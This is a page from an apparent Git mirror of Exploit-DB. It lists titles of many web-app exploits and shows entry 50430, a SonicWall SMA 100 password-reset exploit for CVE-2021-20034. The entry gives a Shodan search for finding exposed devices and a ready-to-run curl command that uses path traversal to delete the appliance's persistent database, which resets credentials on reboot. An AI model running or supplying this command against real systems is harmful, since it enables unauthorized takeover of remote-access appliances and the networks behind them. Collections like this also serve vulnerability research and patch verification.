bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/hardware/webapps/50430.txt
Offensive Security 2ee235ed78 DB: 2021-10-21 
3 changes to exploits/shellcodes

Macro Expert 4.7 - Unquoted Service Path

AssetMan 2.4a - 'download_pdf.php' Remote File Disclosure

PHP-Nuke addon Nuke Mobile Entartainment 1.0 - Local File Inclusion

xKiosk 3.0.1i - 'xkurl.php?PEARPATH' Remote File Inclusion

InstaGuide Weather Script 1.0 - 'index.php' Local File Inclusion

CMSbright - 'id_rub_page' SQL Injection

ParsBlogger - 'blog.asp' SQL Injection

Blog System 1.x - 'note' SQL Injection

PHP Joke Site Software - 'sbjoke_id' SQL Injection

PHP Classifieds ADS - 'sid' Blind SQL Injection

Softbiz Article Directory Script - 'sbiz_id' Blind SQL Injection

Storyteller CMS - 'var' Local File Inclusion

MyPhpAuction 2010 - 'id' SQL Injection

PHP Lowbids - 'viewfaqs.php' Blind SQL Injection

BetMore Site Suite 4 - 'bid' Blind SQL Injection

PHP auctions - 'viewfaqs.php' Blind SQL Injection

PHP Coupon Script 6.0 - 'bus' Blind SQL Injection
PHP Link Directory Software - 'sbcat_id' SQL Injection
PHP Classified ads software - 'cid' Blind SQL Injection
PHP Script Directory Software - 'sbcat_id' SQL Injection
PHP Link Directory Software - 'sbcat_id' SQL Injection
PHP Classified ads software - 'cid' Blind SQL Injection
PHP Script Directory Software - 'sbcat_id' SQL Injection

Weekly Drawing Contest 0.0.1 - 'Check_Vote.php' Local File Inclusion

Holtstraeter Rot 13 - 'Enkrypt.php' Directory Traversal

easyGB 2.1.1 - 'index.php' Local File Inclusion

PHPAuctions - 'viewfaqs.php' SQL Injection
SonicWall SMA 10.2.1.0-17sv - Password Reset
Dolibarr ERP-CRM 14.0.2 - Stored Cross-Site Scripting (XSS) / Privilege Escalation
2021-10-21 05:02:11 +00:00

12 lines
No EOL
756 B
Text
Raw Permalink Blame History

# Exploit Title: SonicWall SMA 10.2.1.0-17sv - Password Reset
# Description: Overwrite the persistent database, resulting in password reset on reboot.
# Shodan Dork: https://www.shodan.io/search?query=title%3A%22Virtual+Office%22+%22Server%3A+SonicWall%22
# Date: 10/19/2021
# Exploit Author: Jacob Baines (@Junior_Baines)
# Root Cause Analysis: https://attackerkb.com/topics/23t9VCbGzt/cve-2021-20034/rapid7-analysis?referrer=profile
# Vendor Homepage: https://www.sonicwall.com/
# Version: SMA 100 Series using 9.0.0.10-28sv, 10.2.0.7-34sv, and 10.2.1.0-17sv
# Tested on: SMA 500v using 9.0.0.10-28sv and 10.2.1.0-17sv
# CVE : CVE-2021-20034
curl -v --insecure "https://10.0.0.6/cgi-bin/handleWAFRedirect?hdl=../flash/etc/EasyAccess/var/conf/persist.db"
Reference in a new issue View git blame Copy permalink